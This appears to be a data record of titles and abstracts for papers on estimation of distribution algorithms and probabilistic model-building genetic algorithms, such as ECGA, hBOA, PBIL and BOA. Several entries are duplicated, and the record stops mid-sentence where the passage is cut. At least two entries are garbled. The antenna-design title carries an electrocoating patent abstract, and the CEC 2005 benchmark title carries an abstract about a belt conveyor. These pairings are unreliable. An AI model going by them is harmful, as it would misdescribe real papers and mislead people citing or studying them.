--- paper_title: Real-coded ECGA for economic dispatch paper_content: In this paper, we propose a new approach that consists of the extended compact genetic algorithm (ECGA) and split-on-demand (SoD), an adaptive discretization technique, to economic dispatch (ED) problems with nonsmooth cost functions. ECGA is designed for handling problems with decision variables of the discrete type, while the decision variables of ED problems are oftentimes real numbers. Thus, in order to employ ECGA to tackle ED problems, SoD is utilized for discretizing the continuous decision variables and works as the interface between ECGA and the ED problem. Furthermore, ED problems in practice are usually hard for traditional mathematical programming methodologies because of the equality and inequality constraints. Hence, in addition to integrating ECGA and SoD, in this study, we devise a repair operator specifically for making the infeasible solutions to satisfy the equality constraint. To examine the performance and effectiveness, we apply the proposed framework to two different-sized ED problems with nonsmooth cost function considering the valve-point effects. The experimental results are compared to those obtained by various evolutionary algorithms and demonstrate that handling ED problems with the proposed framework is a promising research direction. --- paper_title: A new epsilon-dominance hierarchical Bayesian optimization algorithm for large multiobjective monitoring network design problems paper_content: Abstract This study focuses on the development of a next generation multiobjective evolutionary algorithm (MOEA) that can learn and exploit complex interdependencies and/or correlations between decision variables in monitoring design applications to provide more robust performance for large problems (defined in terms of both the number of objectives and decision variables). The proposed MOEA is termed the epsilon-dominance hierarchical Bayesian optimization algorithm ( e -hBOA), which is representative of a new class of probabilistic model building evolutionary algorithms. The e -hBOA has been tested relative to a top-performing traditional MOEA, the epsilon-dominance nondominated sorted genetic algorithm II ( e -NSGAII) for solving a four-objective LTM design problem. A comprehensive performance assessment of the e -NSGAII and various configurations of the e -hBOA have been performed for both a 25 well LTM design test case (representing a relatively small problem with over 33 million possible designs), and a 58 point LTM design test case (with over 2.88 × 10 17 possible designs). The results from this comparison indicate that the model building capability of the e -hBOA greatly enhances its performance relative to the e -NSGAII, especially for large monitoring design problems. This work also indicates that decision variable interdependencies appear to have a significant impact on the overall mathematical difficulty of the monitoring network design problem. --- paper_title: Population Based Incremental Learning: A Method for Integrating Genetic Search Based Function Optimization and Competitve Learning paper_content: Genetic algorithms (GAs) are biologically motivated adaptive systems which have been used, with varying degrees of success, for function optimization. In this study, an abstraction of the basic genetic algorithm, the Equilibrium Genetic Algorithm (EGA), and the GA in turn, are reconsidered within the framework of competitive learning. This new perspective reveals a number of different possibilities for performance improvements. This paper explores population-based incremental learning (PBIL), a method of combining the mechanisms of a generational genetic algorithm with simple competitive learning. The combination of these two methods reveals a tool which is far simpler than a GA, and which out-performs a GA on large set of optimization problems in terms of both speed and accuracy. This paper presents an empirical analysis of where the proposed technique will outperform genetic algorithms, and describes a class of problems in which a genetic algorithm may be able to perform better. Extensions to this algorithm are discussed and analyzed. PBIL and extensions are compared with a standard GA on twelve problems, including standard numerical optimization functions, traditional GA test suite problems, and NP-Complete problems. --- paper_title: Evaluation of Advanced Genetic Algorithms Applied to Groundwater Remediation Design paper_content: Optimal design of a groundwater pump and treat system is a difficult task, especially given the computationally intensive nature of field-scale remediation design. Genetic algorithms (GAs) have been used extensively for remediation design because of their flexibility and global search capabilities, but computational intensity is a particularly difficult issue with GAs. This paper discusses a new competent GA, the hierarchical Bayesian Optimization Algorithm (hBOA), which is designed to reduce the computational effort. GAs operate by assembling highly fit segments of chromosomes (potential solutions), called building blocks. The hBOA enhances the efficiency of this process by using a Bayesian network to create models of the building blocks. The building blocks are nodes on the network, and the algorithm uses the network to generate new solutions, retaining the best building blocks of the parents. This work compares the performance of hBOA to a simple genetic algorithm (SGA) in solving a case study to determine if any benefit can be gained through the use of this approach. This work demonstrates that hBOA more reliably identifies the optimal solution to this groundwater remediation design problem. --- paper_title: Searching for Ground States of Ising Spin Glasses with Hierarchical BOA and Cluster Exact Approximation paper_content: Summary. This chapter applies the hierarchical Bayesian optimization algorithm (hBOA) to the problem of finding ground states of Ising spin glasses with ±J and Gaussian couplings in two and three dimensions. The performance of hBOA is compared to that of the simple genetic algorithm (GA) and the univariate marginal distribution algorithm (UMDA). The performance of all tested algorithms is improved by incorporating a deterministic hill climber based on single-bit flips. The results show that hBOA significantly outperforms GA and UMDA on a broad spectrum of spin glass instances. Cluster exact approximation (CEA) is then described and incorporated into hBOA and GA to improve their efficiency. The results show that CEA enables all tested algorithms to solve larger spin glass instances and that hBOA significantly outperforms other compared algorithms even in this case. --- paper_title: A survey of optimization by building and using probabilistic models paper_content: Summarizes the research on population-based probabilistic search algorithms based on modeling promising solutions by estimating their probability distribution and using the constructed model to guide the exploration of the search space. It settles the algorithms in the field of genetic and evolutionary computation where they have been originated. All methods are classified into a few classes according to the complexity of the class of models they use. Algorithms from each of these classes are briefly described and their strengths and weaknesses are discussed. --- paper_title: Optimising cancer chemotherapy using an estimation of distribution algorithm and genetic algorithms paper_content: This paper presents a methodology for using heuristic search methods to optimise cancer chemotherapy. Specifically, two evolutionary algorithms - Population Based Incremental Learning (PBIL), which is an Estimation of Distribution Algorithm (EDA), and Genetic Algorithms (GAs) have been applied to the problem of finding effective chemotherapeutic treatments. To our knowledge, EDAs have been applied to fewer real world problems compared to GAs, and the aim of the present paper is to expand the application domain of this technique.We compare and analyse the performance of both algorithms and draw a conclusion as to which approach to cancer chemotherapy optimisation is more efficient and helpful in the decision-making activity led by the oncologists. --- paper_title: Automated alphabet reduction method with evolutionary algorithms for protein structure prediction paper_content: This paper focuses on automated procedures to reduce the dimensionality ofprotein structure prediction datasets by simplifying the way in which the primary sequence of a protein is represented. The potential benefits ofthis procedure are faster and easier learning process as well as the generationof more compact and human-readable classifiers.The dimensionality reduction procedure we propose consists on the reductionof the 20-letter amino acid (AA) alphabet, which is normally used to specify a protein sequence, into a lower cardinality alphabet. This reduction comes about by a clustering of AA types accordingly to their physical and chemical similarity. Our automated reduction procedure is guided by a fitness function based on the Mutual Information between the AA-based input attributes of the dataset and the protein structure featurethat being predicted. To search for the optimal reduction, the Extended Compact Genetic Algorithm (ECGA) was used, and afterwards the results of this process were fed into (and validated by) BioHEL, a genetics-based machine learningtechnique. BioHEL used the reduced alphabet to induce rules forprotein structure prediction features. BioHEL results are compared to two standard machine learning systems. Our results show that it is possible to reduce the size of the alphabet used for prediction fromtwenty to just three letters resulting in more compact, i.e. interpretable,rules. Also, a protein-wise accuracy performance measure suggests that the loss of accuracy acrued by this substantial alphabet reduction is not statistically significant when compared to the full alphabet. --- paper_title: Estimation of Distribution Algorithms: A New Tool for Evolutionary Computation paper_content: List of Figures. List of Tables. Preface. Contributing Authors. Series Foreword. Part I: Foundations. 1. An Introduction to Evolutionary Algorithms J.A. Lozano. 2. An Introduction to Probabilistic Graphical Models P. Larranaga. 3. A Review on Estimation of Distribution Algorithms P. Larranaga. 4. Benefits of Data Clustering in Multimodal Function Optimization via EDAs J.M. Pena, et al. 5. Parallel Estimation of Distribution Algorithms J.A. Lozano, et al. 6. Mathematical Modeling of Discrete Estimation of Distribution Algorithms C. Gonzalez, et al. Part II: Optimization. 7. An Empiricial Comparison of Discrete Estimation of Distribution Algorithms R. Blanco., J.A. Lozano. 8. Results in Function Optimization with EDAs in Continuous Domain E. Bengoetxea, et al. 9. Solving the 0-1 Knapsack Problem with EDAs R. Sagarna, P. Larranaga. 10. Solving the Traveling Salesman Problem with EDAs V. Robles, et al. 11. EDAs Applied to the Job Shop Scheduling Problem J.A. Lozano, A. Mendiburu. 12. Solving Graph Matching with EDAs Using a Permutation-Based Representation E. Bengoetxea, et al. Part III: Machine Learning. 13. Feature Subset Selection by Estimation of Distribution Algorithms I. Inza, et al. 14. Feature Weighting for Nearest Neighbor by EDAs I. Inza, et al. 15. Rule Induction by Estimation of Distribution Algorithms B. Sierra, et al. 16. Partial Abductive Inference in Bayesian Networks: An Empirical Comparison Between GAs and EDAs L.M. de Campos, et al.17. Comparing K-Means, GAs and EDAs in Partitional Clustering J. Roure, et al. 18. Adjusting Weights in Artificial Neural Networks using Evolutionary Algorithms C. Cotta, et al. Index. --- paper_title: Military Antenna Design Using a Simple Genetic Algorithm and hBOA paper_content: A bath composition for cataphoretic electrocoating of conductive surfaces contains coating agents which have been rendered soluble or dispersible with acid, contain basic nitrogen groups and carry groups of the general formulae (1) and (11) (I) (II) and, optionally, also groups of the general formulae (III) and/or (IV) (III) (IV) where R1 and R2 are each alkyl, hydroxyalkyl or alkoxyalkyl, R3 and R4 are each hydrogen or methyl, R5 and R6 are each hydrogen, alkyl or a divalent radical of a polymer molecule which is bonded to a phenol or phenol ether, n1 is 1, 2 or 3 and n2 is 1 or 2, and where the oxygen bonded to the phenyl radical is either in the form of the OH group or etherified. --- paper_title: Population Based Incremental Learning: A Method for Integrating Genetic Search Based Function Optimization and Competitve Learning paper_content: Genetic algorithms (GAs) are biologically motivated adaptive systems which have been used, with varying degrees of success, for function optimization. In this study, an abstraction of the basic genetic algorithm, the Equilibrium Genetic Algorithm (EGA), and the GA in turn, are reconsidered within the framework of competitive learning. This new perspective reveals a number of different possibilities for performance improvements. This paper explores population-based incremental learning (PBIL), a method of combining the mechanisms of a generational genetic algorithm with simple competitive learning. The combination of these two methods reveals a tool which is far simpler than a GA, and which out-performs a GA on large set of optimization problems in terms of both speed and accuracy. This paper presents an empirical analysis of where the proposed technique will outperform genetic algorithms, and describes a class of problems in which a genetic algorithm may be able to perform better. Extensions to this algorithm are discussed and analyzed. PBIL and extensions are compared with a standard GA on twelve problems, including standard numerical optimization functions, traditional GA test suite problems, and NP-Complete problems. --- paper_title: A survey of optimization by building and using probabilistic models paper_content: Summarizes the research on population-based probabilistic search algorithms based on modeling promising solutions by estimating their probability distribution and using the constructed model to guide the exploration of the search space. It settles the algorithms in the field of genetic and evolutionary computation where they have been originated. All methods are classified into a few classes according to the complexity of the class of models they use. Algorithms from each of these classes are briefly described and their strengths and weaknesses are discussed. --- paper_title: Estimation of Distribution Algorithms: A New Tool for Evolutionary Computation paper_content: List of Figures. List of Tables. Preface. Contributing Authors. Series Foreword. Part I: Foundations. 1. An Introduction to Evolutionary Algorithms J.A. Lozano. 2. An Introduction to Probabilistic Graphical Models P. Larranaga. 3. A Review on Estimation of Distribution Algorithms P. Larranaga. 4. Benefits of Data Clustering in Multimodal Function Optimization via EDAs J.M. Pena, et al. 5. Parallel Estimation of Distribution Algorithms J.A. Lozano, et al. 6. Mathematical Modeling of Discrete Estimation of Distribution Algorithms C. Gonzalez, et al. Part II: Optimization. 7. An Empiricial Comparison of Discrete Estimation of Distribution Algorithms R. Blanco., J.A. Lozano. 8. Results in Function Optimization with EDAs in Continuous Domain E. Bengoetxea, et al. 9. Solving the 0-1 Knapsack Problem with EDAs R. Sagarna, P. Larranaga. 10. Solving the Traveling Salesman Problem with EDAs V. Robles, et al. 11. EDAs Applied to the Job Shop Scheduling Problem J.A. Lozano, A. Mendiburu. 12. Solving Graph Matching with EDAs Using a Permutation-Based Representation E. Bengoetxea, et al. Part III: Machine Learning. 13. Feature Subset Selection by Estimation of Distribution Algorithms I. Inza, et al. 14. Feature Weighting for Nearest Neighbor by EDAs I. Inza, et al. 15. Rule Induction by Estimation of Distribution Algorithms B. Sierra, et al. 16. Partial Abductive Inference in Bayesian Networks: An Empirical Comparison Between GAs and EDAs L.M. de Campos, et al.17. Comparing K-Means, GAs and EDAs in Partitional Clustering J. Roure, et al. 18. Adjusting Weights in Artificial Neural Networks using Evolutionary Algorithms C. Cotta, et al. Index. --- paper_title: Analyzing Deception in Trap Functions paper_content: Abstract A flat-population schema analysis is performed to find conditions for full deception in trap functions. It is found that the necessary and sufficient condition for an l-bit fully deceptive trap function is that all order l — 1 schemata are misleading, and it is observed that the trap functions commonly used in a number of test suites are not fully deceptive. Further analysis suggests that in a fully deceptive trap function, the locally optimal function value may be as low as 50% of the globally optimal function value. In this context, the limiting ratio of the locally and the globally optimal function value for a number of fully deceptive functions currently in use are calculated. The analysis indicates that trap functions allow more flexibility in designing a deceptive function. It is also found that the proportion of fully deceptive functions in the family of trap functions is only O(l−1 ln l)) and that more than half of the trap functions are fully easy functions. --- paper_title: FDA -A Scalable Evolutionary Algorithm for the Optimization of Additively Decomposed Functions paper_content: The Factorized Distribution Algorithm (FDA) is an evolutionary algorithm which combines mutation and recombination by using a distribution. The distribution is estimated from a set of selected points. In general, a discrete distribution defined for n binary variables has 2(n) parameters. Therefore it is too expensive to compute. For additively decomposed discrete functions (ADFs) there exist algorithms which factor the distribution into conditional and marginal distributions. This factorization is used by FDA. The scaling of FDA is investigated theoretically and numerically. The scaling depends on the ADF structure and the specific assignment of function values. Difficult functions on a chain or a tree structure are solved in about O(n radical n) operations. More standard genetic algorithms are not able to optimize these functions. FDA is not restricted to exact factorizations. It also works for approximate factorizations as is shown for a circle and a grid structure. By using results from Bayes networks, FDA is extended to LFDA. LFDA computes an approximate factorization using only the data, not the ADF structure. The scaling of LFDA is compared to the scaling of FDA. --- paper_title: The gambler's ruin problem, genetic algorithms, and the sizing of populations paper_content: The paper presents a model for predicting the convergence quality of genetic algorithms. The model incorporates previous knowledge about decision making in genetic algorithms and the initial supply of building blocks in a novel way. The result is an equation that accurately predicts the quality of the solution found by a GA using a given population size. Adjustments for different selection intensities are considered and computational experiments demonstrate the effectiveness of the model. --- paper_title: From Recombination of Genes to the Estimation of Distributions I. Binary Parameters paper_content: The Breeder Genetic Algorithm (BGA) is based on the equation for the response to selection. In order to use this equation for prediction, the variance of the fitness of the population has to be estimated. For the usual sexual recombination the computation can be difficult. In this paper we shortly state the problem and investigate several modifications of sexual recombination. The first method is gene pool recombination, which leads to marginal distribution algorithms. In the last part of the paper we discuss more sophisticated methods, based on estimating the distribution of promising points. --- paper_title: Population Based Incremental Learning: A Method for Integrating Genetic Search Based Function Optimization and Competitve Learning paper_content: Genetic algorithms (GAs) are biologically motivated adaptive systems which have been used, with varying degrees of success, for function optimization. In this study, an abstraction of the basic genetic algorithm, the Equilibrium Genetic Algorithm (EGA), and the GA in turn, are reconsidered within the framework of competitive learning. This new perspective reveals a number of different possibilities for performance improvements. This paper explores population-based incremental learning (PBIL), a method of combining the mechanisms of a generational genetic algorithm with simple competitive learning. The combination of these two methods reveals a tool which is far simpler than a GA, and which out-performs a GA on large set of optimization problems in terms of both speed and accuracy. This paper presents an empirical analysis of where the proposed technique will outperform genetic algorithms, and describes a class of problems in which a genetic algorithm may be able to perform better. Extensions to this algorithm are discussed and analyzed. PBIL and extensions are compared with a standard GA on twelve problems, including standard numerical optimization functions, traditional GA test suite problems, and NP-Complete problems. --- paper_title: The compact genetic algorithm paper_content: This paper introduces the "compact genetic algorithm" (cGA). The cGA represents the population as a probability distribution over the set of solutions, and is operationally equivalent to the order-one behavior of the simple GA with uniform crossover. It processes each gene independently and requires less memory than the simple GA. --- paper_title: MIMIC: Finding Optima by Estimating Probability Densities paper_content: In many optimization problems, the structure of solutions reflects complex relationships between the different input parameters. For example, experience may tell us that certain parameters are closely related and should not be explored independently. Similarly, experience may establish that a subset of parameters must take on particular values. Any search of the cost landscape should take advantage of these relationships. We present MIMIC, a framework in which we analyze the global structure of the optimization landscape. A novel and efficient algorithm for the estimation of this structure is derived. We use knowledge of this structure to guide a randomized search through the solution space and, in turn, to refine our estimate ofthe structure. Our technique obtains significant speed gains over other randomized optimization procedures. --- paper_title: Using Optimal Dependency-Trees for Combinatorial Optimization: Learning the Structure of the Search Space paper_content: Many combinatorial optimization algorithms have no mechanism for capturing inter-parameter dependencies. However, modeling such dependencies may allow an algorithm to concentrate its sampling more effectively on regions of the search space which have appeared promising in the past. We present an algorithm which incrementally learns pairwise probability distributions from good solutions seen so far, uses these statistics to generate optimal (in terms of maximum likelihood) dependency trees to model these distributions, and then stochastically generates new candidate solutions from these trees. We test this algorithm on a variety of optimization problems. Our results indicate superior performance over other tested algorithms that either (1) do not explicitly use these dependencies, or (2) use these dependencies to generate a more restricted class of dependency graphs. --- paper_title: Approximating discrete probability distributions with dependence trees paper_content: A method is presented to approximate optimally an n -dimensional discrete probability distribution by a product of second-order distributions, or the distribution of the first-order tree dependence. The problem is to find an optimum set of n - 1 first order dependence relationship among the n variables. It is shown that the procedure derived in this paper yields an approximation of a minimum difference in information. It is further shown that when this procedure is applied to empirical observations from an unknown distribution of tree dependence, the procedure is the maximum-likelihood estimate of the distribution. --- paper_title: The Bivariate Marginal Distribution Algorithm paper_content: The paper deals with the Bivariate Marginal Distribution Algorithm (BMDA). BMDA is an extension of the Univariate Marginal Distribution Algorithm (UMDA). It uses the pair gene dependencies in order to improve algorithms that use simple univariate marginal distributions. BMDA is a special case of the Factorization Distribution Algorithm, but without any problem specific knowledge in the initial stage. The dependencies are being discovered during the optimization process itself. In this paper BMDA is described in detail. BMDA is compared to different algorithms including the simple genetic algorithm with different crossover methods and UMDA. For some fitness functions the relation between problem size and the number of fitness evaluations until convergence is shown. --- paper_title: A Bayesian Approach to Learning Bayesian Networks with Local Structure paper_content: Recently several researchers have investigated techniques for using data to learn Bayesian networks containing compact representations for the conditional probability distributions (CPDs) stored at each node. The majority of this work has concentrated on using decision-tree representations for the CPDs. In addition, researchers typically apply non-Bayesian (or asymptotically Bayesian) scoring functions such as MDL to evaluate the goodness-of-fit of networks to the data. ::: ::: In this paper we investigate a Bayesian approach to learning Bayesian networks that contain the more general decision-graph representations of the CPDs. First, we describe how to evaluate the posterior probability-- that is, the Bayesian score--of such a network, given a database of observed cases. Second, we describe various search spaces that can be used, in conjunction with a scoring function and a search procedure, to identify one or more high-scoring networks. Finally, we present an experimentd evaluation of the search spaces, using a greedy algorithm and a Bayesian scoring function. --- paper_title: Hierarchical Bayesian optimization algorithm: toward a new generation of evolutionary algorithms paper_content: Over the last few decades, genetic and evolutionary algorithms (GEAs) have been successfully applied to many problems of business, engineering, and science. This paper discusses probabilistic model-building genetic algorithms (PMBGAs), which are among the most important directions of current GEA research. PMBGAs replace traditional variation operators of GEAs by learning and sampling a probabilistic model of promising solutions. The paper describes two advanced PMBGAs: the Bayesian optimization algorithm (BOA), and the hierarchical BOA (hBOA). The paper argues that BOA and hBOA can solve an important class of nearly decomposable and hierarchical problems in a quadratic or subquadratic number of function evaluations with respect to the number of decision variables. --- paper_title: FDA -A Scalable Evolutionary Algorithm for the Optimization of Additively Decomposed Functions paper_content: The Factorized Distribution Algorithm (FDA) is an evolutionary algorithm which combines mutation and recombination by using a distribution. The distribution is estimated from a set of selected points. In general, a discrete distribution defined for n binary variables has 2(n) parameters. Therefore it is too expensive to compute. For additively decomposed discrete functions (ADFs) there exist algorithms which factor the distribution into conditional and marginal distributions. This factorization is used by FDA. The scaling of FDA is investigated theoretically and numerically. The scaling depends on the ADF structure and the specific assignment of function values. Difficult functions on a chain or a tree structure are solved in about O(n radical n) operations. More standard genetic algorithms are not able to optimize these functions. FDA is not restricted to exact factorizations. It also works for approximate factorizations as is shown for a circle and a grid structure. By using results from Bayes networks, FDA is extended to LFDA. LFDA computes an approximate factorization using only the data, not the ADF structure. The scaling of LFDA is compared to the scaling of FDA. --- paper_title: Learning Bayesian Networks with Local Structure paper_content: We examine a novel addition to the known methods for learning Bayesian networks from data that improves the quality of the learned networks. Our approach explicitly represents and learns the local structure in the conditional probability distributions (CPDs) that quantify these networks. This increases the space of possible models, enabling the representation of CPDs with a variable number of parameters. The resulting learning procedure induces models that better emulate the interactions present in the data. We describe the theoretical foundations and practical aspects of learning local structures and provide an empirical evaluation of the proposed learning procedure. This evaluation indicates that learning curves characterizing this procedure converge faster, in the number of training instances, than those of the standard procedure, which ignores the local structure of the CPDs. Our results also show that networks learned with local structures tend to be more complex (in terms of arcs), yet require fewer parameters. --- paper_title: Propagating Uncertainty in Bayesian Networks by Probabilistic Logic Sampling paper_content: Bayesian belief networks and influence diagrams are attractive approaches for representing uncertain expert knowledge in coherent probabilistic form. But current algorithms for propagating updates are either restricted to singly connected networks (Chow trees), as the scheme of Pearl and Kim, or they are liable to exponential complexity when dealing with multiply connected networks. Probabilistic logic sampling is a new scheme employing stochastic simulation which can make probabilistic inferences in large, multiply connected networks, with an arbitrary degree of precision controlled by the sample size. A prototype implementation, named Pulse, is illustrated, which provides efficient methods to estimate conditional probabilities, perform systematic sensitivity analysis, and compute evidence weights to explain inferences. --- paper_title: Learning Factorizations in Estimation of Distribution Algorithms Using Affinity Propagation paper_content: Estimation of distribution algorithms (EDAs) that use marginal product model factorizations have been widely applied to a broad range of mainly binary optimization problems. In this paper, we introduce the affinity propagation EDA (AffEDA) which learns a marginal product model by clustering a matrix of mutual information learned from the data using a very efficient message-passing algorithm known as affinity propagation. The introduced algorithm is tested on a set of binary and nonbinary decomposable functions and using a hard combinatorial class of problem known as the HP protein model. The results show that the algorithm is a very efficient alternative to other EDAs that use marginal product model factorizations such as the extended compact genetic algorithm (ECGA) and improves the quality of the results achieved by ECGA when the cardinality of the variables is increased. --- paper_title: An EDA based on local markov property and gibbs sampling paper_content: The key ideas behind most of the recently proposed Markov networks based EDAs were to factorise the joint probability distribution in terms of the cliques in the undirected graph. As such, they made use of the global Markov property of the Markov network. Here we presents a Markov Network based EDA that exploits Gibbs sampling to sample from the Local Markov property, the Markovianity, and does not directly model the joint distribution. We call it Markovianity based Optimisation Algorithm. Some initial results on the performance of the proposed algorithm shows that it compares well with other Bayesian network based EDAs. --- paper_title: The Bivariate Marginal Distribution Algorithm paper_content: The paper deals with the Bivariate Marginal Distribution Algorithm (BMDA). BMDA is an extension of the Univariate Marginal Distribution Algorithm (UMDA). It uses the pair gene dependencies in order to improve algorithms that use simple univariate marginal distributions. BMDA is a special case of the Factorization Distribution Algorithm, but without any problem specific knowledge in the initial stage. The dependencies are being discovered during the optimization process itself. In this paper BMDA is described in detail. BMDA is compared to different algorithms including the simple genetic algorithm with different crossover methods and UMDA. For some fitness functions the relation between problem size and the number of fitness evaluations until convergence is shown. --- paper_title: Linkage Problem, Distribution Estimation, and Bayesian Networks paper_content: This paper proposes an algorithm that uses an estimation of the joint distribution of promising solutions in order to generate new candidate solutions. The algorithm is settled into the context of genetic and evolutionary computation and the algorithms based on the estimation of distributions. The proposed algorithm is called the Bayesian Optimization Algorithm (BOA). To estimate the distribution of promising solutions, the techniques for modeling multivariate data by Bayesian networks are used. The BOA identifies, reproduces, and mixes building blocks up to a specified order. It is independent of the ordering of the variables in strings representing the solutions. Moreover, prior information about the problem can be incorporated into the algorithm, but it is not essential. First experiments were done with additively decomposable problems with both nonoverlapping as well as overlapping building blocks. The proposed algorithm is able to solve all but one of the tested problems in linear or close to linear time with respect to the problem size. Except for the maximal order of interactions to be covered, the algorithm does not use any prior knowledge about the problem. The BOA represents a step toward alleviating the problem of identifying and mixing building blocks correctly to obtain good solutions for problems with very limited domain information. --- paper_title: Learning Bayesian Networks: The Combination of Knowledge and Statistical Data paper_content: We describe a Bayesian approach for learning Bayesian networks from a combination of prior knowledge and statistical data. First and foremost, we develop a methodology for assessing informative priors needed for learning. Our approach is derived from a set of assumptions made previously as well as the assumption oflikelihood equivalence, which says that data should not help to discriminate network structures that represent the same assertions of conditional independence. We show that likelihood equivalence when combined with previously made assumptions implies that the user's priors for network parameters can be encoded in a single Bayesian network for the next case to be seen—aprior network—and a single measure of confidence for that network. Second, using these priors, we show how to compute the relative posterior probabilities of network structures given data. Third, we describe search methods for identifying network structures with high posterior probabilities. We describe polynomial algorithms for finding the highest-scoring network structures in the special case where every node has at mostk=1 parent. For the general case (k>1), which is NP-hard, we review heuristic search algorithms including local search, iterative local search, and simulated annealing. Finally, we describe a methodology for evaluating Bayesian-network learning algorithms, and apply this approach to a comparison of various approaches. --- paper_title: Learning Bayesian networks: the combination of knowledge and statistical data paper_content: We describe scoring metrics for learning Bayesian networks from a combination of user knowledge and statistical data. We identify two important properties of metrics, which we call event equivalence and parameter modularity. These properties have been mostly ignored, but when combined, greatly simplify the encoding of a user's prior knowledge. In particular, a user can express his knowledge--for the most part--as a single prior Bayesian network for the domain. --- paper_title: Dependency trees, permutations, and quadratic assignment problem paper_content: This paper describes and analyzes an estimation of distribution algorithm based on dependency tree models (dtEDA), which can explicitly encode probabilistic models for permutations. dtEDA is tested on deceptive ordering problems and a number of instances of the quadratic assignment problem. The performance of dtEDA is compared to that of the standard genetic algorithm with the partially matched crossover (PMX) and the linear order crossover (LOX). In the quadratic assignment problem, the robust tabu search is also included in the comparison. --- paper_title: Solving the Traveling Salesman Problem with EDAs paper_content: In this chapter we present an approach for solving the Traveling Sales man Problem using Estimation of Distribution Algorithms (EDAs). This approach is based on using discrete and continuous EDAs to find the best possible solution. We also present a method in which domain knowledge (based on local search) is combined with EDAs to find better solutions. We show experimental results obtained on several standard examples for discrete and continuous EDAs both alone and combined with a heuristic local search. --- paper_title: Probabilistic Model-Building Genetic Algorithms in Permutation Representation Domain Using Edge Histogram paper_content: Recently, there has been a growing interest in developing evolutionary algorithms based on probabilistic modeling. In this scheme, the offspring population is generated according to the estimated probability density model of the parent instead of using recombination and mutation operators. In this paper, we have proposed probabilistic model-building genetic algorithms (PMBGAs) in permutation representation domain using edge histogram based sampling algorithms (EHBSAs). Two types of sampling algorithms, without template (EHBSA/WO) and with template (EHBSA/WT), are presented. The results were tested in the TSP and showed EHBSA/WT worked fairly well with a small population size in the test problems used. It also worked better than well-known traditional two-parent recombination operators. --- paper_title: Genetic Algorithms and Random Keys for Sequencing and Optimization paper_content: In this paper we present a general genetic algorithm to address a wide variety of sequencing and optimization problems including multiple machine scheduling, resource allocation, and the quadratic assignment problem. When addressing such problems, genetic algorithms typically have difficulty maintaining feasibility from parent to offspring. This is overcome with a robust representation technique called random keys . Computational results are shown for multiple machine scheduling, resource allocation, and quadratic assignment problems. INFORMS Journal on Computing , ISSN 1091-9856, was published as ORSA Journal on Computing from 1989 to 1995 under ISSN 0899-1499. --- paper_title: Getting the best of both worlds: discrete and continuous genetic and evolutionary algorithms in concert paper_content: This paper describes an evolutionary algorithm for optimization of continuous problems that combines advanced recombination techniques for discrete representations with advanced mutation techniques for continuous representations. Discretization is used to transform solutions between the discrete and continuous domains. The proposed algorithm combines the strengths of purely continuous and purely discrete approaches and eliminates some of their disadvantages. The paper tests the proposed algorithm with the recombination operator of the Bayesian optimization algorithm, σ-self-adaptive mutation, and three discretization methods. The empirical results on three problems suggest that the tested variant of the algorithm scales up well on all tested problems, indicating good scalability over a broad range of continuous problems. --- paper_title: Problem Definitions and Evaluation Criteria for the CEC 2005 Special Session on Real-Parameter Optimization paper_content: An elevating conveyor having a first endless belt entrained around a plurality of spaced support or guide drums for elevating material through an elevating section to a discharge station and a second endless loading belt also entrained around guide drums to cooperate with the first belt at least where a loading station and the elevating section merge so that in this vicinity the belts are in overlying relationship with each other so that material on the upper surface of one belt is held on the surface by the other belt. The two belts are moved at similar speeds in the same direction and a fixed plate cooperates with the first belt in the elevating section so that material located between the belt and plate is elevated to the discharge station by upward movement of the first belt through the elevating section. The conveyor may be of C, L or Z shape and the first belt preferably has upstanding side walls, the top faces of which bear against low friction material supported on the plate. --- paper_title: Adaptive discretization for probabilistic model building genetic algorithms paper_content: This paper proposes an adaptive discretization method, called Split-on-Demand (SoD), to enable the probabilistic model building genetic algorithm (PMBGA) to solve optimization problems in the continuous domain. The procedure, effect, and usage of SoD are described in detail. As an example, the integration of SoD and the extended compact genetic algorithm (ECGA), named real-coded ECGA (rECGA), is presented and numerically examined. The experimental results indicate that rECGA works well and SoD is effective. The behavior of SoD is analyzed and discussed, followed by the potential future work for SoD. --- paper_title: Enabling the Extended Compact Genetic Algorithm for Real-Parameter Optimization by Using Adaptive Discretization paper_content: An adaptive discretization method, called split-on-demand (SoD), enables estimation of distribution algorithms (EDAs) for discrete variables to solve continuous optimization problems. SoD randomly splits a continuous interval if the number of search points within the interval exceeds a threshold, which is decreased at every iteration. After the split operation, the nonempty intervals are assigned integer codes, and the search points are discretized accordingly. As an example of using SoD with EDAs, the integration of SoD and the extended compact genetic algorithm (ECGA) is presented and numerically examined. In this integration, we adopt a local search mechanism as an optional component of our back end optimization engine. As a result, the proposed framework can be considered as a memetic algorithm, and SoD can potentially be applied to other memetic algorithms. The numerical experiments consist of two parts: (1) a set of benchmark functions on which ECGA with SoD and ECGA with two well-known discretization methods: the fixed-height histogram (FHH) and the fixed-width histogram (FWH) are compared; (2) a real-world application, the economic dispatch problem, on which ECGA with SoD is compared to other methods. The experimental results indicate that SoD is a better discretization method to work with ECGA. Moreover, ECGA with SoD works quite well on the economic dispatch problem and delivers solutions better than the best known results obtained by other methods in existence. --- paper_title: Evolutionary Algorithm Using Marginal Histogram Models Continuous Domain paper_content: Recently, there has been a growing interest in developing evolutionary algorithms based on probabilistic modeling. In this scheme, the offspring population is generated according to the estimated probability density model of the parents instead of using recombination and mutation operators. In this paper, we propose an evolutionary algorithm using a marginal histogram to model the parent population in a continuous domain. We propose two types of marginal histogram models: the fixed-width histogram (FWH) and the fixed-height histogram (FHH). The results showed that both models worked fairly well on test functions with no or weak interactions among variables. Especially, FHH could find the global optimum with very high accuracy effectively and showed good scale-up with the problem size. --- paper_title: Real-valued Evolutionary Optimization using a Flexible Probability Density Estimator paper_content: Population-Based Incremental Learning (PBIL) is an abstraction of a genetic algorithm, which solves optimization problems by explicitly constructing a probabilistic model of the promising regions of the search space. At each iteration the model is used to generate a population of candidate solutions and is itself modified in response to these solutions. Through the extension of PBIL to Real-valued search spaces, a more powerful and general algorithmic framework arises which enables the use of arbitrary probability density estimation techniques in evolutionary optimization. To illustrate the usefulness of the framework, we propose and implement an evolutionary algorithm which uses a finite Adaptive Gaussian mixture model density estimator. This method offers considerable power and flexibility in the forms of the density which can be effectively modeled. We discuss the general applicability of the framework, and suggest that future work should lead to the development of better evolutionary optimization algorithms. --- paper_title: Real-Coded Bayesian Optimization Algorithm: Bringing the Strength of BOA into the Continuous World paper_content: This paper describes a continuous estimation of distribution algorithm (EDA) to solve decomposable, real-valued optimization problems quickly, accurately, and reliably. This is the real-coded Bayesian optimization algorithm (rBOA). The objective is to bring the strength of (discrete) BOA to bear upon the area of real-valued optimization. That is, 